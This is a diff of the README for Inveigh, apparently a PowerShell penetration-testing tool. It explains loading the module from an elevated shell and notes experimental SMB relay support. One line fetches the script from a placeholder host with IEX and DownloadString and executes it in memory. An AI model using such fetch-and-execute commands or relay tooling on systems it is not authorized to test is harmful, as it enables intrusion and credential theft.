Kevin-Robertson/Inveigh/README.md

 10. SMB relay support is experimental at this point, use caution if employing on a pen test.

 # Usage
-Obtain an elevated administrator or SYSTEM shell.

-Use a method to load the module:
+Obtain an elevated administrator or SYSTEM shell and use a method to load the module

 To import with Import-Method:
 Import-Module ./Inveigh.ps1

 To import with dot source method:
 . ./Inveigh.ps1

 To load into memory using Invoke-Expression:
 IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")

 To execute with default settings:
 Invoke-Inveigh

 To load and execute with one line:
 Import-Module ./Inveigh.ps1;Invoke-Inveigh

 To execute with features enabled/disabled: